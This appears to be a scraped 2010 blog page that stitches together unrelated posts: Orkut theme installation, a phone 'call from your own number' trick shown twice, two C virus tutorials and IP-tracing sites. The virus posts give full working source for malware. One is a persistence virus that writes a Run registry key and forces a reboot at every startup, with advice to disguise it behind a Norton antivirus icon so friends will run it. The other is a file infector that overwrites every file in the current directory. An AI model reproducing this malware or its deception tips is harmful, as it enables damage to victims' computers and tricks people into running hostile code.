Wednesday, January 6, 2010

where did you get themes

just log on to
http://www.funmastiunlimited.com/2009/11/world-of-warcraft-orkut-theme-01/

How to install Orkut themes in Firefox

*

Tags

Aamir Khan Abhishek Bachchan Aishwarya Rai Amisha Patel Amitabh Bachchan Amrita Rao Bikini Babes Bikini Beauties Celina Jaitley Claudia Ciesla Cosmopolitan Deepika Padukone FHM Filmfare Firefox Genelia D'Souza Giselle Monteiro Hansika Motwani Hot Models Hrithik Roshan Install Jacqueline Fernandez Kangana Ranaut Kareena Kapoor Katrina Kaif Kim Kardashian Kingfisher Babes Malaika Arora Marie Claire Maxim Minissha Lamba Namitha Orkut Theme Raima Sen Ranbir Kapoor Riya Sen Saif Ali Khan Salman Khan Sameera Reddy Shah Rukh Khan Shriya Saran South Beauties Trailers Verve Vidya Balan

*

Recent Comments

o Noor on Zarine Khan in Salman Khan’s Veer: First Look

o Nitin on Zarine Khan in Salman Khan’s Veer: First Look

o Mahek on Zarine Khan in Salman Khan’s Veer: First Look

o admin on World Of Warcraft Orkut Theme 01

o Prasad on World Of Warcraft Orkut Theme 01







How to install Orkut themes in Firefox

November 16, 2009 by admin

Filed under: Orkut Themes



To install Orkut themes in Firefox, you will have to first install Greasemonkey. Read the article: How to install Greasemonkey



After installing Greasemonkey, click on the ‘Download this Orkut Theme’ link from our website for the Orkut theme that you would like to install. Now follow the steps given below:



Method 1



Use this method if, on clicking the download link for a Orkut theme, a dialog box opens up as shown below. Click on the ‘Install’ button and the theme will be installed. Log in to your Orkut page, you will now be able to see the Orkut theme that you installed. Refresh the web page (or press F5 key) in case the theme cannot be seen.
Method 2




Use this method if, on clicking the download link for a Orkut theme, instead of a dialog box, a page opens up which contains software code. In this case, on the menu bar of Firefox browser, click on ‘Tools’ —–> Greasemonkey —–> ‘Install This Script’. The Orkut theme will then be installed. Log in to your Orkut page, you will now be able to see the Orkut theme that you installed. Refresh the web page (or press F5 key) in case the theme cannot be seen.



Method 3



Use this method if, on clicking the download link for a Orkut theme, a dialog box opens up as shown below. Click on the ‘Save File’ button. Save the file, for e.g. in ‘My Documents’. Go to ‘My Documents’ and select the downloaded userscript file, right-click on it and choose the ‘Open With’ option. Select Firefox as the option. Then you will have to use either Method 1 or Method 2 as explained above, to install the Orkut theme. When you log in to your Orkut page, you will then be able to see the Orkut theme that you installed. Refresh the web page (or press F5 key) in case the theme cannot be seen.

Tuesday, January 5, 2010

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…….




Just try the following steps and you’ll get a call to your cell phone from your own number.







1. Just give a missed call to this number. You’ll not be charged!



+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number



3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.



4. She say’s- Your PIN cannot be processed and the call disconnects

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…….




Just try the following steps and you’ll get a call to your cell phone from your own number.







1. Just give a missed call to this number. You’ll not be charged!



+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number



3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.



4. She say’s- Your PIN cannot be processed and the call disconnects

Home » C SOURCE CODES, VIRUS CREATION

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.



For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;



case 2:

target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;



case 3:

target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;



case 4:

target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}



NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.



Compiling The Scource Code Into Executable Virus.



1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.



Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.



1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to



HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run





There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.



Logic Behind The Working Of The Virus



If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.



LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.



This process is repeated every time the PC is restarted.



NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.



AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)



After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.



For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.



The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

How to Create a Computer Virus?

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.






#include

#include

#include

#include

#include

#include



FILE *virus,*host;

int done,a=0;

unsigned long x;

char buff[2048];

struct ffblk ffblk;

clock_t st,end;



void main()

{

st=clock();

clrscr();

done=findfirst(“*.*”,&ffblk,0);

while(!done)

{

virus=fopen(_argv[0],”rb”);

host=fopen(ffblk.ff_name,”rb+”);

if(host==NULL) goto next;

x=89088;

printf(“Infecting %s\n”,ffblk.ff_name,a);

while(x>2048)

{

fread(buff,2048,1,virus);

fwrite(buff,2048,1,host);

x-=2048;

}

fread(buff,x,1,virus);

fwrite(buff,x,1,host);

a++;

next:

{

fcloseall();

done=findnext(&ffblk);

}

}

printf(“DONE! (Total Files Infected= %d)”,a);

end=clock();

printf(“TIME TAKEN=%f SEC\n”,

(end-st)/CLK_TCK);

getch();

}



COMPILING METHOD:



BORLAND TC++ 3.0 (16-BIT):



1. Load the program in the compiler, press Alt-F9 to compile



2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)



3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)



4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)



5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect



BORLAND C++ 5.5 (32-BIT) :



1. Compile once,note down the generated EXE file length in bytes



2. Change the value of X in source code to this length in bytes



3. Recompile it.The new EXE file is ready to infect



HOW TO TEST:



1. Open new empty folder



2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)



3. Run the virus EXE file there you will see all the files in the current directory get infected.



4.All the infected files will be ready to reinfect

Home » HACKING FOR BEGINNERS, IP ADDRESS, NETWORK HACKS


In my earlier post I had discussed about how to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com. Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.




1. Country in which the IP is located



2. Region



3. City



4. Latitude/Longitude



5. Zip Code



6. Time Zone



7. Name of the ISP



8. Internet Speed



9. Weather Station



10. Area Code and



11. Domain name associated with the IP address.



A sample snapshot of the results from ip2location.com is given below







You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.